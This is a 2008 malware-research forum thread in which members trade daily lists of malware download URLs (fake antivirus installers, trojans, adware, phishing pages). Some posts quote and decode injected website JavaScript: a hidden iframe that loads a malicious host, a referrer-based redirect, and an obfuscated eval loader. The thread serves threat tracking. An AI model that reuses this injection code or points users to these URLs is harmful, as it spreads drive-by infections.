http://www.virustotal.com/analisis/bed224b3a6050bdfd8826049f4755202
Result: 3/36 (8.34%)

The only part of it which is in plain text view,is the following...
Code: [Select]
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
As soon as I replaced xanjan.cn with google.com...
http://www.virustotal.com/analisis/9cc7dae965c757c745a80eb4c424b65e
Result: 2/36 (5.56%)

And when removing the whole of the aformentioned plain text script...
http://www.virustotal.com/analisis/63ed068268e977a32b92f70e7076f977
Result: 1/36 (2.78%)

In short,besides the...high-tech strings-based detection,
almost no AV got alarmed by the rest 5 remaining and heavily obfuscated scripts there?
Title: Re: daily something......
Post by: lanvin on September 24, 2008, 09:26:34 am
Code: [Select]
http://www.lzitw.com/kj/hoho.exe
https://ssl1140.websiteseguro.com/nokiabrasil/Imagens_de_todos.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_Jr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/imagemsngr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_libs.jpg
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://www2.odn.ne.jp/~caj37650/jishin.exe
http://scanner.microantivirus-2009.com/setup/install_3697_MHwzNnwxMDEwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivir2009.com/setup/install_1392_MHwzNnwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
http://www.spytech-web.com/spyagent/Files601/YahooDLL.dll
http://www.spytech-web.com/spyagent/Files/sbrowse.dat
http://www.spytech-web.com/spyagent/Files601/SystemSA32.dll
http://www.spytech-web.com/realtime-spy/Files20/NTInvisible.dll
http://dm.screensavers.com/dm/installers/si/1/sinstaller.cab
http://dm.screensavers.com/dm/installers/si/3/s_sinstallerandtoolbar3.exe
http://dm.screensavers.com/dm/installers/si/beta/s_sinstallerandtoolbar.exe
http://files.screensavers.com/sss/bin/sinstallerandtoolbar3.exe
Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 02:34:48 pm
Quote
hxxp://funciclearin.com/counter.php
hxxp://search-you-need.com/le/index.php?code=K2l7J41xQY
hxxp://www.mnbenio.ru/script.js
Title: Re: daily something......
Post by: SysAdMini on September 24, 2008, 02:40:02 pm
Hi sowhat-x,

here is the haitou.php thing. Lines separated by "--------------".


Code: [Select]
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')

----------------


if (document.referrer != "http://verify.com") {

document.write("<span style='display:none' id='d1'>");

}


----------------

var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111115&ref='+escape(document.referrer)+'"></sc'+'ript>')

}

----------------

<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>

-----------------

if (document.referrer != "http://verify.com") {

document.write("<span style='display:none' id='d1'>");


}

-------------------

if (document.referrer != "http://verify.com") {

document.write("<span style='display:none' id='d1'>");

}


Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 02:55:32 pm
...so except from xanjan.cn...this haitou.php,is it supposed to be phishing related or something?
Or is it some weird kind of stats-tracking?  ???
coi.html and/or coiu.html were found in many servers that hosted this obfucated haitoo.php...

Edit:Yeap,it's phishing related indeed,just checked a random coiu.html...
What's weird (and annoying also), is that earlier it's contents were...different!  :o
Can't remember though what they contained....  :(
Title: Re: daily something......
Post by: CM_MWR on September 24, 2008, 05:07:31 pm
Heh...google the text not the redirections.

allyourbasebelongstous

yahoo--> /haitou.php

1 - 10 of 12,200 and its way old too,with all these still lurking and steadily infecting.

Remember the lot of links i posted in private where the browser went into infinite loop...;)

I have used google,msn and yahoo for this search term for well over 4 months and still to this day get jam up hits for malware rotators.

When looking in some directories youll start seeing patterns---> system_.php,move.html,r.html and several others.

Its a part of a very large whole from the beginning of the year,one of those injections we all talked about way back.
Title: Re: daily something......
Post by: SysAdMini on September 24, 2008, 05:36:33 pm
...so except from xanjan.cn...is it supposed to be phishing related or something?

Code: [Select]
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')

means: if your referrer is a search engine( you came to this page from a search engine),
then it redirects you to personal.count....

You will get the following script from this url.

Code: [Select]
function S(hF,e){if(!e){e='1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';}var x;var Rg='';for(var I=0;I<hF.length;I+=4){x=(e.indexOf(hF.charAt(I))&255)<<18|(e.indexOf(hF.charAt(I+1))&255)<<12|(e.indexOf(hF.charAt(I+2))&255)<<(6)|e.indexOf(hF.charAt(I+3))&255;Rg+=String.fromCharCode((x&16711680)>>16,(x&65280)>>8,x&255);}eval(Rg);}S('d4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S');

decodes to
Code: [Select]
document.write('<sc'+'ript> document.location="http://go-scan-pc.com/?uid=152" </sc'+'ript>'); 

go-scan-pc.com (ESTDOMAINS) has no content at the moment.


Title: Re: daily something......
Post by: MysteryFCM on September 24, 2008, 09:06:24 pm
go-scan-pc.com redirs to;

http://scan-ia.com/20/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1

Which gives you an 84K file (UPolyX v0.5 packed according to UE);

http://scan-ia.com/download/IAInstall.exe
Title: Re: daily something......
Post by: MysteryFCM on September 24, 2008, 09:09:12 pm
Detection is rubbish (3/36)

/edit

Just for kicks and giggles ;)

http://hosts-file.net/?s=216.32.69.165
http://hosts-file.net/?s=216.32.69.165&sDM=1#matches

I had 9 already listed ..... I've now got 48 on this IP :)
Title: Re: daily something......
Post by: SysAdMini on September 24, 2008, 09:13:49 pm
go-scan-pc.com
scan-ia.com

= ESTDOMAINS


KOKACH !!
Title: Re: daily something......
Post by: MysteryFCM on September 24, 2008, 09:23:02 pm
I'd be surprised if they weren't all Est ......... "cleaning up" my arse .....
Title: Re: daily something......
Post by: SysAdMini on September 25, 2008, 10:24:00 am
Detection is rubbish (3/36)

Report from Anubis :

http://anubis.iseclab.org/result.php?taskid=a2867294c98294b4c5be525712d4473a&refresh=1 (http://anubis.iseclab.org/result.php?taskid=a2867294c98294b4c5be525712d4473a&refresh=1)

IAInstall.exe downloads

Code: [Select]
hxxp://ia-install.com/download/InternetAntivirus.exe
http://www.virustotal.com/de/analisis/612efcc0065c050fb49876f6a82f476b (http://www.virustotal.com/de/analisis/612efcc0065c050fb49876f6a82f476b)


Title: Re: daily something......
Post by: sowhat-x on September 25, 2008, 12:14:31 pm
Quote
you'll start seeing patterns ---> system_.php,move.html,r.html and several others.
That's why I said...  ;)
Quote
"Whatever the case,all of the following are open dirs,
so you can examine directories/scripts contained there at will..."
And there's even more crap planted there per occasion except from the above patterns,
but I didn't had the patience to try following them over...

Quote
go-scan-pc.com
scan-ia.com

= ESTDOMAINS

KOKACH !!

(http://bestsmileys.com/lol/1.gif)

Quote
(UPolyX v0.5 packed according to UE);
At least at a first glance,it seems to be a home-made protection,but I may be wrong on this...
it's been years since I had checked UPolyX...maybe I should so again  ;)
Title: Re: daily something......
Post by: lanvin on September 25, 2008, 03:09:57 pm
Code: [Select]
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://fwt.txdnl.com/4-10/j/a/jacklinda1/videos2008.exe
http://fwt.txdnl.com/5-10/v/i/videoshowww/You_tube_play.exe
http://fwt.txdnl.com/6-10/d/o/downloadflash/svchostss.exe
http://fwt.txdnl.com/6-30/p/h/phongcan/girlvietvip.jpg
Title: Re: daily something......
Post by: sowhat-x on September 25, 2008, 06:17:51 pm
I agree,the thread here has already got messy...and it's my fault.
I'll edit/move the haitou.php links I've posted in a new thread...
Title: Re: daily something......
Post by: lanvin on September 25, 2008, 07:32:51 pm
nice discussion ;D
Title: Re: daily something......
Post by: sowhat-x on September 25, 2008, 07:33:19 pm
Lol!  :D
Title: Re: daily something......
Post by: SysAdMini on September 25, 2008, 07:36:01 pm
nice discussion ;D

I'm sorry. This was your thread. We have messed it up. ;D
Title: Re: daily something......
Post by: CM_MWR on September 26, 2008, 01:18:17 am
Blame it on TJS  :P
Title: Re: daily something......
Post by: tjs on September 26, 2008, 05:59:36 am
lol
Title: Re: daily something......
Post by: lanvin on September 26, 2008, 11:22:33 am
Code: [Select]
http://www.mastercrew.xpg.com.br/CPF.jpg    5.4M
http://dd7.tesekl.info/net.exe
http://trabalho01.pisem.su/imglog.jpg    2.7M
http://greg-search.com/G7/control.exe
http://novotempo01.sites.uol.com.br/nega.jpg 
http://gsnet.front.ru/gm.exe
Title: Re: daily something......
Post by: JohnC on September 26, 2008, 10:10:09 pm
Thank you.
Title: Re: daily something......
Post by: lanvin on September 27, 2008, 12:05:46 pm
nice discussion ;D

I'm sorry. This was your thread. We have messed it up. ;D

That's ok:)
Glad to see your discussion :P
Title: Re: daily something......
Post by: lanvin on September 27, 2008, 12:06:42 pm
Code: [Select]
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880154.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://ia-scanonline.com/download/IAInstall.exe
Title: Re: daily something......
Post by: lanvin on September 29, 2008, 09:52:39 am
Code: [Select]
http://enu.v6.update.cab.en.winupdate.com.updatescabensrv70.cn/setup.exe
https://s.aolcdn.com/art/aimindia/aol_india_messenger_6.5.16.2.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880595.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_77040502.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880113.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880181.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880056.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_77013615.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_77040506.exe
http://fullantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://fullantivirusscan.com/2009/download/trial/A9installer_77071503.exe
http://www.acespy.com/dls/acespy.exe
http://secureclick1.com/2009/download/trial/A9installer_880285.exe
http://secureclick1.com/2009/download/trial/A9installer_880293.exe
http://secureclick1.com/2009/download/trial/A9installer_880488.exe
http://secureclick1.com/2009/download/trial/A9installer_880135.exe
http://secureclick1.com/2009/download/trial/A9installer_880551.exe
http://secureclick1.com/2009/download/trial/A9installer_880705.exe
http://secureclick1.com/2009/download/trial/A9installer_880221.exe
http://ia-scanonline.com/download/IAInstall.exe
http://bestprivatetube.com/cd/519/0/Adobe%20Acrobat%20Pro%207.0%20(Serial).exe
http://bestprivatetube.com/cd/519/0/Active%20Partition%20Recovery%20v3.0.exe
http://bestprivatetube.com/cd/519/0/Zoom%20Search%20Engine%20Professional%20Edition%20v5.1.exe
http://bestprivatetube.com/cd/519/0/Mystery%20P.I.%20The%20Lottery%20Ticket%20v1.0.0.3%20by%20LineZer0.exe
http://personalantispy.com/.ware/js/order.js
http://www.personalantispy.com/.ware/js/order.js
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880154.exe
http://stat.antimalware2009.com/download/17/AntiMalware2009Installer.exe
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://theprivatetube.com/cd/219/0/wmcodec_update.exe
http://theprivatetube.com/cd/174/0/wmcodec_update.exe
http://theprivatetube.com/cd/183/0/wmcodec_update.exe
http://theprivatetube.com/cd/83/0/wmcodec_update.exe
http://theprivatetube.com/cd/357/0/wmcodec_update.exe
http://theprivatetube.com/cd/402/0/image_decoder.exe
http://theprivatetube.com/cd/767/0/wmcodec_update.exe
http://theprivatetube.com/cd/519/0/AutoDesk%20AutoCAD%202007.exe
http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://smartantivirusv2.com/soft/sa2009.exe
http://viruslabs2009.com/distrib/1/virlab_install.exe
http://viruslabs2009.com/distrib/1012/virlab_install.exe
http://scanner.microantivirus-2009.com/setup/install_3697_MHwzNnwxMDEwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivirus-2009.com/setup/install_4887_MHwzNnwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivirus-2009.com/setup/install_4749_MHwzNnwxMDIwMDAwMDAwfHx8fHx8fHw_.exe
http://win-antivirus-2008.com/a/Install.exe
http://scanner.win-antivirus-2008.com/setup/setup_1257_MHwzM3wxMDIwMDAwMDAwfHx8fHx8_.exe
http://up.50db34d5.info/update.gif
http://xh-codec.net/download/crack.Steinberg.Nuendo.3.2.0.1128c3098.exe
http://xh-codec.net/download/crack.Visual.CertExam.Suite.1.9.978c3098.exe
http://xh-codec.net/download/keygen.Nero.8.3.6.0c3098.exe
http://xh-codec.net/download/keygen.Nero.8.3.6.0c3098.exe
http://xh-codec.net/download/keygen.Norton.Internet.Security.2008c3098.exe
http://xh-codec.net/download/keygen.Microsoft.Live.OneCare.2.0c3098.exe
http://xh-codec.net/download/keygen.RealPlayer.11.0.0.446c3098.exe
http://xh-codec.net/download/serial.Microsoft.Live.OneCare.2.0c3098.exe
http://stat.antivirusxp08.net/download/16/AntivirusXP2008Installer.exe
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://www.registrycleanerxp.com/download/setup_rcxp.exe
http://216.12.204.2/softwareclub/sccdc.exe
http://216.12.204.2/softwareclub/scnb.exe
http://216.12.204.2/softwareclub/scdr.exe
http://216.12.204.2/softwareclub/scax.exe
http://216.12.204.2/softwareclub/scnl.exe
http://216.12.204.2/softwareclub/scmp.exe
http://216.12.204.2/softwareclub/sccs.exe
http://216.12.204.2/softwareclub/scsm.exe
http://216.12.204.2/softwareclub/scst.exe
http://216.12.204.2/softwareclub/scaex.exe
http://216.12.204.2/softwareclub/sccc.exe
http://viruslabs2009.com/distrib/1/virlab_install.exe
http://viruslabs2009.com/distrib/1012/virlab_install.exe
http://download.dailykeys.com/files/intellij%20idea%207.0.4.exe
http://download.dailykeys.com/files/animal%20seks%20video.com.exe
http://kpdef8.com/download/rhtools14e.zip
http://ntsecurity.nu/downloads/clearlogs.exe
http://soft.enet.org.cn/kejian/gongju/X-Scan-v3.3-cn.rar
http://downloads.zango.com/zangogames/library/setuplibrary2797.exe
http://downloads.zango.com/zangogames/dvg/setupdavid2365.exe
http://downloads.zango.com/zangogames/chamber/setupchamber2848.exe
http://upgrades.hotbar.com/installs/hotbar/programs/4.8.0.0/hbtstart.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.cab
http://installs.hotbar.com/installs/hbtools/programs/hbtools.exe
http://downloads.zango.com/zangogames/zangotv/setupzangotv2593.exe
http://installs.hotbar.com/installs/hotbar/programs/10.0.368.0/hotbar.exe




Title: Re: daily something......
Post by: lanvin on October 01, 2008, 12:23:18 pm
phishing:
hxxp://mess.network-hosting.com/pey/Confirm.htm

fake alert:
nod-32.net

porn:
bestyounggirls.com 
enakedgirls.com
previewadultvideos.com
Title: Re: daily something......
Post by: lanvin on October 02, 2008, 02:34:55 pm
eigenstart.nl
hxxp://www.eigenstart.nl/toolbar/content/eigenstartsetup.exe

myspyprotector.com
hxxp://www.myspyprotector.com/software/myspyprotector_04.exe
hxxp://www.myspyprotector.com/software/myspyprotector_03.exe
hxxp://www.myspyprotector.com/software/myspyprotector_05.exe

pic iframe
hxxp://picturelink.66735.com/member/img/reg.gif
hxxp://picturelink.66735.com/plus/img/file_move.gif
hxxp://picturelink.66735.com/plus/img/sysinfo.gif
hxxp://picturelink.66735.com/plus/img/bad.gif

visualscanprotection.com
hxxp://visualscanprotection.com/download/av_2009.exe
Title: Re: daily something......
Post by: JohnC on October 03, 2008, 11:30:01 am
Thank you.
Title: Re: daily something......
Post by: lanvin on October 03, 2008, 12:22:36 pm
Fake alert
uav2008.com
bestprivatetube.net
antivirus-2009-pro.net

Porn
hardxtc.com
olderporntubes.com


hxxp://www.bestprivatetube.net/cd/603/5/wmcodec_update.exe






Title: Re: daily something......
Post by: CM_MWR on October 03, 2008, 10:44:37 pm
Adwares

Code: [Select]
203.117.111.46/banners/bak.php?b=3002
203.117.111.46/banners/bak.php?b=3024
203.117.111.46/banners/des2.php?b=3002
203.117.111.46/banners/des2.php?b=3024
203.117.111.46/banners/pr.php?b=3002
203.117.111.46/banners/pr.php?b=3024
203.117.111.46/banners/xp.php?b=3002
203.117.111.46/banners/xp.php?b=3024
64.225.156.213/EV191065/?code=BundleBase1.1065
64.225.156.213/reporting/IpGeo.aspx
64.225.156.213/xmi2h/awmT251.exe
85.17.166.229/gtest2/index.php?sid=053001340235073507360b3d053c0e380934
85.17.166.229/gtest2/load.php?id=0&sid=053001340235073507360b3d053c0e380934&spl=1
85.17.166.229/gtest2/pdf.php?id=0&sid=053001340235073507360b3d053c0e380934
aaqarkznvb.com/progs/zrxyyvz/hdnos.php?adv=adv449&code1=JNL0&code2=3103&id=-186345958&p=1
aaqarkznvb.com/progs/zrxyyvz/nwgunnool.php
aaqarkznvb.com/progs/zrxyyvz/vocmzaan
aaqarkznvb.com/progs/zrxyyvz/zsscd.php?adv=adv449
ad.netcrefer.net/banner/serve.php?sv=300x250
ad.netcrefer.net/banner/show.php?cid=1479844&tid=6456212511&sv=300x250
ad.netcrefer.net/code/const.php
ad.netcrefer.net/code/jvmvers.jar
ad.netcrefer.net/code/smain.php?scout=acxcobj
ad.netcrefer.net/code/smain.php?scout=acxcrds
ad.netcrefer.net/code/smain.php?scout=jvcxeng
ad.netcrefer.net/code/smain.php?scout=objmsit
ad.netcrefer.net/code/srun.php
ad.netcrefer.net/get.php?src=eeevsnet
ad.netcrefer.net/get.php?src=rasesnet
ad.netcrefer.net/get.php?src=wavvsnet
ad.netcrefer.net/get.php?src=winvsnet
ad.netcrefer.net/servecs?atype=p0
ad.netcrefer.net/xpre.exe
ad.netcrefer.net/xrun.exe
ad.trafficmp.com/a/js?plid=6224&ad_w=160&ad_h=600
ad.trafficmp.com/a/js?plid=6443&ad_w=468&ad_h=60
ad.trafficmp.com/a/js?plid=6741&ad_w=120&ad_h=600
ad.trafficmp.com/a/js?plid=7564&ad_w=120&ad_h=600
ad.trafficmp.com/a/js?plid=7567&ad_w=468&ad_h=60
ad.trafficmp.com/a/js?plid=8468&ad_w=120&ad_h=600
ad.trafficmp.com/a/js?plid=9343
ad.trafficmp.com/a/pbk?adv=395&dim=15
bizcash.info/go/to.php?id=003
bizcash.info/go/to.php?id=004
bizcash.info/go/to.php?id=005
bizcash.info/go/to.php?id=dal001
dl.targetsaver.com/2k/affupdate2.php?affversion=0.0.0.0&tsversion=4.0.4.1&code=1804289383&aid=109&continent=136211462&country=840&region=11&metro=524&city=3670
dl.targetsaver.com/2k/tsinstall_4_0_4_0_b4.exe
dl.targetsaver.com/2k/tsupdate_4_0_4_1_b3.exe
dl.targetsaver.com/2k/tsupdate2.ini
dl.targetsaver.com/2k/tsupdate2.php
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fads.vidsense.com%2Fr%2F259%2Fa%2F100196%2Fl%2Fat0rm6&affiliateID=8279&trace=T:6(82314)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fads.vidsense.com%2Fr%2F260%2Fa%2F100196%2Fl%2F6h1ce4&affiliateID=8244&trace=T:6(79772)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fgo.egotvonline.com%2Fr%2F1311%2Fa%2F157059%2Fl%2Fsk5vw5&affiliateID=8215&trace=T:6(75969)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fgo.egotvonline.com%2Fr%2F1311%2Fa%2F157059%2Fl%2Fxx8kn3&affiliateID=8228&trace=T:6(78308)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fpopunder.multi-pops.com%2FadsDirect.php%3Fcid%3D7490990%26id%3Dfindology07%26sid%3D73440%26ref%3Dhttp%3A%2F%2Fwww.findology.com&affiliateID=2957&trace=T:
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fservedby.onlinemediadiva.com%2Fcode%3Fdcc%3Don%26pid%3D1460%26gid%3D4&affiliateID=8357&trace=T:6(85978)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fwww.vbs.tv%2Findex_quiet2.php&affiliateID=6604&trace=T:
dl.targetsaver.com/vtrack.php?params=13952ac125d48993f1498456b9697dfe296faa94-cGlkPTE0OSZjYW1wYWlnbklEPTM4MDMmY3JlYXRpdmVJRD0zNDkyJmlwPTk3Ljgw%0ALjEzNy4xMTAmdHJhY2U9NCgxNTcwKTEwKDc1MzI2MSkmY3B2X3JhdGU9MC4wMTA5%0AMDAmQ291bnRyeUNvZGU9ODQwJnNycG5hbWU9Q1BWaW50ZXJuJnNhaWQ9MCZrZXl3%0Ab3JkPWNvbnNvbGlkYXRpb24lMjBsb2FuJTIwcmVmaW5hbmNlJTIwc3R1ZGVudA%3D%3D%0A
dl2.bundlext.com/get.php?p=3cd898b13299cb4bc0d5dc64745518ed&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=773953af7fc444d491933450d966e0b2&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=8605fbac333a37d112b7d4b2e6de281f&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=93e4c2046fcb4ac4bdc3dbbcc28127fb&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=b433b5a80d2cb00f8f1c54387f9aa332&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=c1f5cc94a30f082054f3a00e6655462d&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=26453da423d82a5fc6fae941d05f1151&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=718f466754402ac597de014577627f96&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=a537119c47192bc08952189ae8782f08&cb2=6900cc07255f403aa633f9364283176b
espads.net/banner/serve.php?sv=728x90
espads.net/banner/show.php?cid=1136935&tid=5167264347&sv=728x90
espads.net/banner/show.php?cid=1141348&tid=5164003215&sv=728x90
espads.net/banner/show.php?cid=1470144&tid=5165524616&sv=728x90
espads.net/banner/show.php?cid=1735912&tid=5167311394&sv=728x90
espads.net/code/smain.php
espads.net/code/smain.php?scout=acxcobj
espads.net/code/smain.php?scout=acxcrds
espads.net/code/smain.php?scout=jvcxeng
espads.net/placeholder-1679546-2213145333
espads.net/xrun.exe
randomnewnames.com/paypopup.html
randomnewnames.com/v/files/targets.gz
randomnewnames.com/v/we-active.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0&pc=0&pc2=0&country=US
randomnewnames.com/v/we-config.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&ucnt=0
randomnewnames.com/v/we-connect.php
randomnewnames.com/v/we-content.php?cid=16&uid=17646394261871452226&rnd=5803
randomnewnames.com/v/we-content.php?cid=356&uid=17646394261871452226&rnd=9651
randomnewnames.com/v/we-content.php?cid=358&uid=17646394261871452226&rnd=3721
randomnewnames.com/v/we-content.php?cid=359&uid=17646394261871452226&rnd=9371
randomnewnames.com/v/we-content.php?cid=374&uid=17646394261871452226&rnd=4611
randomnewnames.com/v/we-content.php?cid=374&uid=17646394261871452226&rnd=6433
randomnewnames.com/v/we-content.php?cid=377&uid=17646394261871452226&rnd=2910
randomnewnames.com/v/we-content.php?cid=380&uid=17646394261871452226&rnd=3931
randomnewnames.com/v/we-content.php?cid=382&uid=17646394261871452226&rnd=2432
randomnewnames.com/v/we-content.php?cid=382&uid=17646394261871452226&rnd=2559
randomnewnames.com/v/we-content.php?cid=385&uid=17646394261871452226&rnd=648
randomnewnames.com/v/we-content.php?cid=387&uid=17646394261871452226&rnd=5666
randomnewnames.com/v/we-content.php?cid=388&uid=17646394261871452226&rnd=2422
randomnewnames.com/v/we-content.php?cid=390&uid=17646394261871452226&rnd=432
randomnewnames.com/v/we-dictionaries.php
randomnewnames.com/v/we-install.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&key=e00f3e0322f287351fc10feff0471412
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=ron&country=US
randomnewnames.com/v/we-tpa.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0
www.antispyware-review.biz/a/b1.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
www.antispyware-review.biz/a/b3.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
www.antispyware-review.biz/a/b4.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
www.antispyware-review.biz/a/b5.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
ya-tracker.com/pdfdoc/index.php?id=468
ya-tracker.com/pdfdoc/index.php?id=728
Title: Re: daily something......
Post by: lanvin on October 05, 2008, 11:40:51 am
Fake antivirus
eantivirus-payment. com
e-antiviruspro. com

Porn
lamaporn.com
ebony-black-pussy.net

Trojan
hxxp://www.yyjjoopp.com/abc.exe
hxxp://exetools.com/files/unpackers/win/ni2untelock.zip
hxxp://exetools.com/files/stickers/exebind.zip
hxxp://exetools.com/files/others/ratpackr.zip
Title: Re: daily something......
Post by: lanvin on October 07, 2008, 05:56:41 pm
Code: [Select]
http://msn.account.hotmail.ru/Cancelar.exe
http://albumbloglinda.hotmail.ru/album.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://zfzuguo.cn/hb/24.exe
http://zfzuguo.cn/hb/7.exe
http://zfzuguo.cn/goole10.exe
Title: Re: daily something......
Post by: tjs on October 07, 2008, 06:49:21 pm
hxxp://msn.account.hotmail.ru/Cancelar.exe

Great domain name. lol.. thx for sharing.

TJS
Title: Re: daily something......
Post by: tjs on October 07, 2008, 08:00:31 pm
from hxxp://zfzuguo.cn/updater.txt

hxxp://mb02.cn/hb/0.exe
hxxp://mb02.cn/hb/1.exe
hxxp://mb02.cn/hb/2.exe
hxxp://mb02.cn/hb/3.exe
hxxp://mb02.cn/hb/4.exe
hxxp://mb02.cn/hb/5.exe
hxxp://mb02.cn/hb/6.exe
hxxp://mb02.cn/hb/7.exe
hxxp://mb02.cn/hb/8.exe
hxxp://mb02.cn/hb/9.exe
hxxp://mb02.cn/hb/01.exe
hxxp://mb02.cn/hb/10.exe
hxxp://mb02.cn/hb/11.exe
hxxp://mb02.cn/hb/12.exe
hxxp://mb02.cn/hb/13.exe
hxxp://mb02.cn/hb/14.exe
hxxp://mb02.cn/hb/15.exe
hxxp://mb02.cn/hb/16.exe
hxxp://mb02.cn/hb/17.exe
hxxp://mb02.cn/hb/18.exe
hxxp://mb02.cn/hb/19.exe
hxxp://mb02.cn/hb/20.exe
hxxp://mb02.cn/hb/21.exe
hxxp://mb02.cn/hb/22.exe
hxxp://mb02.cn/hb/23.exe
hxxp://mb02.cn/hb/24.exe
hxxp://mb02.cn/hb/25.exe
hxxp://mb02.cn/hb/27.exe
hxxp://mb02.cn/hb/28.exe
hxxp://mb02.cn/hb/29.exe
hxxp://mb02.cn/hb/30.exe
hxxp://mb02.cn/hb/26.exe
hxxp://mb02.cn/hb/31.exe
Title: Re: daily something......
Post by: lanvin on October 08, 2008, 03:15:39 pm
from hxxp://zfzuguo.cn/updater.txt

hxxp://mb02.cn/hb/0.exe
hxxp://mb02.cn/hb/1.exe
hxxp://mb02.cn/hb/2.exe
hxxp://mb02.cn/hb/3.exe
hxxp://mb02.cn/hb/4.exe
hxxp://mb02.cn/hb/5.exe
hxxp://mb02.cn/hb/6.exe
hxxp://mb02.cn/hb/7.exe
hxxp://mb02.cn/hb/8.exe
hxxp://mb02.cn/hb/9.exe
hxxp://mb02.cn/hb/01.exe
hxxp://mb02.cn/hb/10.exe
hxxp://mb02.cn/hb/11.exe
hxxp://mb02.cn/hb/12.exe
hxxp://mb02.cn/hb/13.exe
hxxp://mb02.cn/hb/14.exe
hxxp://mb02.cn/hb/15.exe
hxxp://mb02.cn/hb/16.exe
hxxp://mb02.cn/hb/17.exe
hxxp://mb02.cn/hb/18.exe
